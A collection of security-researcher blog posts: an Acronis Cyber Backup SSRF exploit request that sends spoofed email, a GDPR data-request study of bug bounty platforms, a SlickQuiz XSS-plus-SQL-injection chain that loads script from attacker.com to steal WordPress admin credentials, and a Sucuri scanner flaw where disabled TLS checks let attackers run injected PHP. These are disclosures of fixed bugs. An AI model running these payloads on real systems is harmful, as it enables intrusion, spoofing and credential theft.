This in return does only check whether the allow_add_devices configuration is enabled (which is the standard config) before passing the request to the vulnerable _route_the_request_to_ams method:

               
def _route_add_devices_request_to_ams(*dummy_args, **dummy_kwargs):
    if not config.CONFIG.get('allow_add_devices', True):
        raise exceptions.operation_forbidden_error('Add devices')

    return _route_the_request_to_ams(*dummy_args, **dummy_kwargs)

So we’ve found our attackable route without authentication here.

Sending Fully Customized Emails Including An Attachment

Apart from doing meta-data stuff or similar, I wanted to entirely fire the SSRF against one of Cyber Backup’s internal web services. There are many these, and there are a whole bunch of web services whose authorization concept solely relies only on being callable from the localhost. Sounds like a weak spot, right?

One interesting internal web service is listening on localhost port 30572: the Notification Service. This service offers a variety of functionality to send out notifications. One of the provided endpoints is /external_email/:

@route(r'^/external_email/?')
class ExternalEmailHandler(RESTHandler):
    @schematic_request(input=ExternalEmailValidator(), deserialize=True)
    async def post(self):
        try:
            error = await send_external_email(
                self.json['tenantId'], self.json['eventLevel'], self.json['template'], self.json['parameters'],
                self.json.get('images', {}), self.json.get('attachments', {}), self.json.get('mainRecipients', []),
                self.json.get('additionalRecipients', [])
            )
            if error:
                raise HTTPError(http.BAD_REQUEST, reason=error.replace('\n', ''))
        except RuntimeError as e:
            raise HTTPError(http.BAD_REQUEST, reason=str(e))

I’m not going through the send_external_email method in detail since it is rather complex, but this endpoint essentially uses parameters supplied via HTTP POST to construct an email that is send out afterwards.

The final working exploit looks like the following:

POST /api/ams/agents HTTP/1.1
Host: 10.211.55.10:9877
Shard: localhost:30572/external_email?
Connection: close
Content-Length: 719
Content-Type: application/json;charset=UTF-8

{"tenantId":"00000000-0000-0000-0000-000000000000",
"template":"true_image_backup",
"parameters":{
"what_to_backup":"what_to_backup",
"duration":2,
"timezone":1,
"start_time":1,
"finish_time":1,
"backup_size":1,
"quota_servers":1,
"usage_vms":1,
"quota_vms":1,"subject_status":"subject_status",
"machine_name":"machine_name",
"plan_name":"plan_name",
"subject_hierarchy_name":"subject_hierarchy_name",
"subject_login":"subject_login",
"ams_machine_name":"ams_machine_name",
"machine_name":"machine_name",
"status":"status","support_url":"support_url"
},
"images":{"test":"./critical-alert.png"},
"attachments":{"test.html":"PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg=="},
"mainRecipients":["[email protected]"]}

This involves a variety of “customizations” for the email including a base64-encoded attachments value. Issuing this POST request returns null:

but ultimately sends out the email to the given mainRecipients including some attachments:

Perfectly spoofed mail, right ;-) ?

The Fix

Acronis fixed the vulnerability in version v12.5 Build 16342 of Acronis Cyber Backup by changing the way that get_ams_address gets the actual Shard address. It now requires an additional authorization header with a JWT that is passed to a method called resolve_shard_address:

# WebServer/wcs/web/temp_ams_proxy.py:
def get_ams_address(headers):
    if config.is_msp_environment():
        auth = headers.get('Authorization')
        _bearer_prefix = 'bearer '
        _bearer_prefix_len = len(_bearer_prefix)
        jwt = auth[_bearer_prefix_len:]
        tenant_id = headers.get('X-Apigw-Tenant-Id')
        logging.info('GET_AMS: tenant_id: {}, jwt: {}'.format(tenant_id, jwt))
        if tenant_id and jwt:
            return wcs.web.session.resolve_shard_address(jwt, tenant_id)

While both values tenant_id and jwt are not explicitly validated here, they are simply used in a new hardcoded call to the API endpoint /api/account_server/tenants/ which ultimately verifies the authorization:

# WebServer/wcs/web/session.py:
def resolve_shard_address(jwt, tenant_id):
    backup_account_server = config.CONFIG['default_backup_account_server']
    url = '{}/api/account_server/tenants/{}'.format(backup_account_server, tenant_id)

    headers = {
        'Authorization': 'Bearer {}'.format(jwt)
    }

    from wcs.web.proxy import make_request
    result = make_request(url,
                          logging.getLogger(),
                          method='GET',
                          headers=headers).json()
    kind = result['kind']
    if kind not in ['unit', 'customer']:
        raise exceptions.unsupported_tenant_kind(kind)
    return result['ams_shard']

Problem solved.

Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I do care a lot about data protection and privacy things. I’ve also been in the situation, where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I’ve sent out the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was explicitly informed beforehand that the request, respectively, their answer, is part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR):
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare the responses that are quite different in style, completeness, accuracy, and thoroughness, I’ve decided to only count answers that are a part of the official answer. After the official response, discussions are not considered here, because accepting those might create advantages across competitors. This should give a clear understanding of how thoroughly each platform reads and answers the GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating:

Indicator Expectation
All good, everything provided, expectations met.
Improvable, at least one (obvious) piece of information is missing, only implicitly answered.
Left out, missing a substantial amount of data or a significant data point and/or unmet expectations.

This light system is then applied to the different GDPR questions and derived points either from the questions themselves or from the data provided.

Results Overview

To give you a quick overview of how the different platforms performed, here’s a summary showing the lights indicators. For a detailed explanation of the indicators, have a look at the detailed response evaluations below.

Question HackerOne Bugcrowd Synack Intigriti Zerocopter
Did the platform meet the deadline?
(Art. 12 par. 3 GDPR)
Did the platform explicitly validate my identity for all provided email addresses?
(Art. 12 par. 6 GDPR)
Did the platform hand over the results for free?
(Art. 12 par. 5 GDPR)
Did the platform provide a full copy of my data?
(Art. 15 par. 3 GDPR)
Is the provided data accurate?
(Art. 5 par. 1 (d) GDPR)
Specific question: Which personal data about me is stored and/or processed by you?
(Art. 15 par. 1 (b) GDPR)
Specific question: What is the purpose of processing this data?
(Art. 15 par. 1 (a) GDPR)
Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)?
(Art. 15 par. 1 (c) GDPR)
Specific question: If the personal data wasn’t supplied directly by me, where does it originate from?
(Art. 15 par. 1 (g) GDPR)
Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR?
(Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 01st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was/were not provided.

However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording/how long those are retained.

HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs. However, they currently do not have any ability to search in it for personal data (it’s also not used for anything according to HackerOne)
What is the purpose of processing this data? Operate our Services, fulfill our contractual obligations in our service contracts with customers, to review and enforce compliance with our terms, guidelines, and policies, To analyze the use of the Services in order to understand how we can improve our content and service offerings and products, For administrative and other business purposes, Matching finders to customer programs -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling While analyzing the provided dataset, I noticed that the list was missing a specific third-party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but it’s also only a non-general one, so the indicator is only orange.

HackerOne added the data point as a result of this study.
If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following:

Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I’ve received quite a huge JSON file, which was quite easily parsable using your preferred scripting language. However, if a non-technical person would receive the data this way, they’d probably have issues getting useful information out of it.

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I’ve sent the request to their official support channel, but there was no explicit validation to verify it’s really me, for neither of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a couple of information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete since it misses a lot of data points that can be found on the researcher portal, such as a history of authenticated devices (IP addresses see your sessions on your Bugcrowd profile), my ISC2 membership number, everything around the identity verification.

There might be more data points such as logs collected through their (for some programs) required proxies or VPN endpoints, which is required by some programs, but no information was provided about that.

Bugcrowd did neither provide anything about all other given email addresses, nor did they deny to have anything related to them.
Is the provided data accurate? No. The provided data isn’t accurate. Address information, as well as email addresses and payment information are super old (it does not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they’ve provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file, as shown above. I was astonished about the compactness of the answer and asked again to answer all the provided questions as per GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I’ve mentioned more than once that the provided data is inaccurate and incomplete and that they’ve left out most of the questions, which I have a right by law to get an answer to. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 03th July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint”, respectively “LaunchPoint+” which requires every participant to go through when testing targets. What they do know - at least - is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack did neither provide anything about all other given email addresses nor did they deny to have anything related to them.

Since I do consider these to be significant data points in the context of Synack that weren’t provided, the indicator is red
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn Profile, Twitter handle, website or blog, relevant certifications, passport details (including number, expiry data, issuing country), Twitter handle and Github handle

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a couple of information are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned, but still processed.

“Log information” in the context of “Account information” and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team” are too vague since it could be anything.

There is no mention of either LaunchPoint, LaunchPoint+ or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third-parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third- party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage itself is not a safeguard. Therefore the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and due to the added proofs, I can confirm that it has been signed within the deadline set for their GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also attached copy of the privacy policy (in terms of data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I’ve still updated the table for Synack accordingly.

Intigriti

Request sent out: 07th April 2020
Response received: 04th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & lastname, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven’t seen it active anymore since then, so I do not consider this data point anymore.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, Several payment providers (TransferWise, PayPal, Pioneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which includes third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After gathering for clarification, Intigriti told me that they’re only hosting in the Europe region in regard to AWS and Google.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files were provided to read in all data programmatically.

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes Zerocopter validated all email addresses that I’ve mentioned in my request by asking personal questions about the account in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First-, last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact information with Zerocopter themselves such as provided through email, marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation Website, Application, Services, and provision of information, Implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for agreement implementation between Zerocopter and me, if there is an obligation to transmit it to government agencies, a training event is held, or the business gets reorganized. Zerocopter did not explicitly name any of these third-parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “ These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the largest part, Zerocopter did only cite their privacy policy, which is a bit hard to read for non-legal people.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, it seems that European bug bounty platforms like Intigriti and Zerocopter generally do better or rather seem to be better prepared for incoming GDPR requests than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne has handed over this data after their official response, Intigriti and Zerocopter have not explicitly answered that question. However, both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it’s probably a rather rarely asked question.

See you next year ;-)

H1-4420: From Quiz to Admin - Chaining Two 0-Days to Compromise An Uber Wordpress

10 September 2019 at 00:00

TL;DR

While doing recon for H1-4420, I stumbled upon a Wordpress blog that had a plugin enabled called SlickQuiz. Although the latest version 1.3.7.1 was installed and I haven’t found any publicly disclosed vulnerabilities, it still somehow sounded like a bad idea to run a plugin that hasn’t been tested with the last three major versions of Wordpress.

So I decided to go the very same route as I did already for last year’s H1-3120 which eventually brought me the MVH title: source code review. And it paid off again: This time, I’ve found two vulnerabilities named CVE-2019-12517 (Unauthenticated Stored XSS) and CVE-2019-12516 (Authenticated SQL Injection) which can be chained together to take you from being an unauthenticated Wordpress visitor to the admin credentials.

Due to the sensitivity of disclosed information I’m using an own temporarily installed Wordpress blog throughout this blog article to demonstrate the vulnerabilities and the impact.

CVE-2019-12517: Going From Unauthenticated User to Admin via Stored XSS

During the source code review, I stumbled upon multiple (obvious) stored XSS vulnerabilities when saving user scores of quizzes. Important side note: It does not matter whether “Save user scores” plugin option is disabled (default) or enabled, the pure presence of a quiz is sufficient for explotiation since this option does only disable/enable the UI elements.

The underlying issue is located in php/slickquiz-scores.php in the method generate_score_row() (lines 38-52) where the responses to quizzes are returned without encoding them first:

function generate_score_row( $score )
        {
            $scoreRow = '';

            $scoreRow .= '<tr>';
            $scoreRow .= '<td class="table_id">' . $score->id . '</td>';
            $scoreRow .= '<td class="table_name">' . $score->name . '</td>';
            $scoreRow .= '<td class="table_email">' . $score->email . '</td>';
            $scoreRow .= '<td class="table_score">' . $score->score . '</td>';
            $scoreRow .= '<td class="table_created">' . $score->createdDate . '</td>';
            $scoreRow .= '<td class="table_actions">' . $this->get_score_actions( $score->id ) . '</td>';
            $scoreRow .= '</tr>';

            return $scoreRow;
        }

Since $score->name, $score->email and $score->score are use-controllable, a simple request like the following is enough to get three XSS payloads into the SlickQuiz backend:

POST /wordpress/wp-admin/admin-ajax.php?_wpnonce=593d9fff35 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
DNT: 1
Connection: close

action=save_quiz_score&json={"name":"xss<script>alert(1)</script>","email":"test@localhost<script>alert(2)</script>","score":"<script>alert(3)</script>","quiz_id":1}

As soon as any user with access to the SlickQuiz dashboard visits the user scores, all payloads fire immediately:

So far so good. That’s already a pretty good impact, but there must be more.

CVE-2019-12516: Authenticated SQL Injections To the Rescue

The SlickQuiz plugin is also vulnerable to multiple authenticated SQL Injections almost whenever the id parameter is present in any request. For example the following requests:

/wp-admin/admin.php?page=slickquiz-scores&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-edit&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-preview&id=(select*from(select(sleep(5)))a)

all cause a 5 second delay:

The underlying issue of i.e. the /wp-admin/admin.php?page=slickquiz-scores&id=(select*from(select(sleep(5)))a) vulnerability is located in php/slickquiz-scores.php in the constructor method (line 20) where the GET parameter id is directly supplied to the method get_quiz_by_id():

$quiz = $this->get_quiz_by_id( $_GET['id'] );

Whereof the method get_quiz_by_id() is defined in php/slickquiz-model.php (lines 27-35):

function get_quiz_by_id( $id )
        {
            global $wpdb;
            $db_name = $wpdb->prefix . 'plugin_slickquiz';

            $quizResult = $wpdb->get_row( "SELECT * FROM $db_name WHERE id = $id" );

            return $quizResult;
        }

Another obvious one.

Connecting XSS and SQLi for Takeover

Now let’s connect both vulnerabilities to get a real Wordpress takeover :-)

First of all: Let’s get the essential login details of the first Wordpress user (likely to be the admin): user’s email, login name and hashed password. I’ve built this handy SQLi payload to achieve that:

1337 UNION ALL SELECT NULL,CONCAT(IFNULL(CAST(user_email AS CHAR),0x20),0x3B,IFNULL(CAST(user_login AS CHAR),0x20),0x3B,IFNULL(CAST(user_pass AS CHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM wordpress.wp_users--

This eventually returns requested data within an <h2> tag:

With this payload and a little bit of JavaScript, it’s now possible to exploit the SQLi using a JavaScript XMLHttpRequest:

let url = 'http://localhost/wordpress/wp-admin/admin.php?page=slickquiz-scores&id=';
let payload = '1337 UNION ALL SELECT NULL,CONCAT(IFNULL(CAST(user_email AS CHAR),0x20),0x3B,IFNULL(CAST(user_login AS CHAR),0x20),0x3B,IFNULL(CAST(user_pass AS CHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM wordpress.wp_users--'

let xhr = new XMLHttpRequest();
xhr.withCredentials = true;

xhr.onreadystatechange = function() {
  if (xhr.readyState === XMLHttpRequest.DONE) {
    let result = xhr.responseText.match(/(?:<h2>SlickQuiz Scores for ")(.*)(?:"<\/h2>)/);
    alert(result[1]);
  }
}

xhr.open('GET', url + payload, true);
xhr.send();

Now changing the XSS payload to:

POST /wordpress/wp-admin/admin-ajax.php?_wpnonce=593d9fff35 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
DNT: 1
Connection: close

action=save_quiz_score&json={"name":"xss","email":"test@localhost<script src='http://www.attacker.com/slickquiz.js'>","score":"1 / 1","quiz_id":1}on=save_quiz_score&json={"name":"xss<script>alert(1)</script>","email":"test@localhost<script src='http://www.attacker.com/slickquiz.js'>","score":"1 / 1","quiz_id":1}

Will cause the XSS to fire and alert the Wordpress credentials:

From this point on, everything’s possible, just like sending this data cross-domain via another XMLHttpRequest etc.

Thanks Uber for the nice bounty!

About a Sucuri RCE…and How Not to Handle Bug Bounty Reports

20 June 2019 at 00:00

TL;DR

Sucuri is a self-proclaimed “most recommended website security service among web professionals” offering protection, monitoring and malware removal services. They ran a Bug Bounty program on HackerOne and also blogged about how important security reports are. While their program was still active, I’ve been hacking on them quite a lot which eventually ranked me #1 on their program.

By the end of 2017, I have found and reported an explicitly disabled SSL certificate validation in their server-side scanner, which could be used by an attacker with MiTM capabilities to execute arbitrary code on Sucuri’s customer systems.

The result: Sucuri provided me with an initial bounty of 250 USD for this issue (they added 500 USD later due to a misunderstanding on their side) - out of an announced 5000 USD max bounty, fixed the issue, closed my report as informative and went completely silent to apparently prevent the disclosure of this issue.

Every Sucuri customer who is using the server-side scanner and who installed it on their server before June 2018 should immediately upgrade the server-side scanner to the most recent version which fixes this vulnerability!

SSL Certificate Validation is Overrated

As part of their services, Sucuri offers a custom server-side scanner, which customers can place on their servers and which runs periodic scans to detect integrity failures / compromises. Basically the server-side scanner is just a custom PHP script with a random looking filename of i.e. sucuri-[md5].php which a customer can place on their webserver.

NOTE: Due to a copyright notice in the script itself, I cannot share the full server-side scanner script here, but will use pseudo-code instead to show its logic. If you want to play with it by yourself, register an account with them and grab the script by yourself ;-)

<?php
$endpoint = "monitor2";
$pwd = "random-md5";

if(!isset($_GET['run']))
{
    exit(0);
}

if(!isset($_POST['secret']))
{
    exit(0);
}

$c = curl_init();
curl_setopt($c, CURLOPT_URL, "https://$endpoint.sucuri.net/imonitor");
curl_setopt($c, CURLOPT_POSTFIELDS, "p=$pwd&amp;q=".$_POST['secret']); 
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($c);

$b64 =  base64_decode($result);

eval($b64);
?>

As soon as you put the script in the web root of your server and configure your Sucuri account to perform server-side scans, the script instantly gets hit by the Sucuri Integrity Monitor with an HTTP POST request targeting the run method like the following:

This HTTP POST request does also include the secret parameter as shown in the pseudocode above and basically triggers a bunch of IP validations to make sure that only Sucuri is able to trigger the script. Unfortunately this part is flawed as hell due to stuff like:

$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']

(But that’s an entirely different topic and not covered by this post.)

By the end of the script, a curl request is constructed which eventually triggers a callback to the Sucuri monitoring system. However, there is one strange line in the above code:

curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);

So Sucuri explicitly set CURLOPT_SSL_VERIFYPEER to false. The consequences of this are best described by the curl project itself:

WARNING: disabling verification of the certificate allows bad guys to man-in-the-middle the communication without you knowing it. Disabling verification makes the communication insecure. Just having encryption on a transfer is not enough as you cannot be sure that you are communicating with the correct end-point.

So this is not cool.

The issued callback doesn’t contain anything else than the previously mentioned secret and looks like the following:

The more interesting part is actually the response to the callback which contains a huge base64 string prefixed by the string WORKED::

After decoding I noticed that it’s simply some PHP code which was generated on the Sucuri infrastructure to do the actual server-side scanning. So essentially a Man-in-the-Middle attacker could simply replace the base64 string with his own PHP code just like c3lzdGVtKCJ0b3VjaCAvdG1wL3JjZSIpOw== which is equal to system("touch /tmp/rce");:

Which finally leads to the execution of the arbitrary code on the customer’s server:

How Not to Handle Security Reports

This is actually the most interesting part, because communicating with Sucuri was a pain. Since there have been a lot of communication back and forth between me, Sucuri and HackerOne on different ways including the platform and email, The following is a summary of the key events of the communication and should give a good impression about Sucuri’s way to handle security reports.

2017-11-05

I’ve sent the initial report to Sucuri via HackerOne (report #287580)

2017-11-16

Sucuri says that they are aware of the issue but CURLOPT_SSL_VERIFYPEER cannot be enabled due to many hosters not offering the proper libraries and the attack scenario would include an attacker having MiTM on the hoster.

MiTM is required - true. But there are many ways to achieve this, and the NSA and Chinese authorities have proven to be capable of such scenarios in the past. And I’m not even talking about sometimes critical compliance requirements such as PCI DSS.

2017-11-17

Sucuri does not think that a MiTM is doable:

Think about it, If MITM the way you are describing was doable, you would be able to hijack emails from almost any provider (as SMTP goes unencrypted), redirect traffic by hijacking Google’s 8.8.8.8 DNS and create much bigger issues across the whole internet.

Isn’t that exactly the reason why we should use TLS across the world and companies such as Google try to enforce it wherever possible?

2017-11-17

I came up with a bunch of other solutions to tackle the “proper libraries issue”:

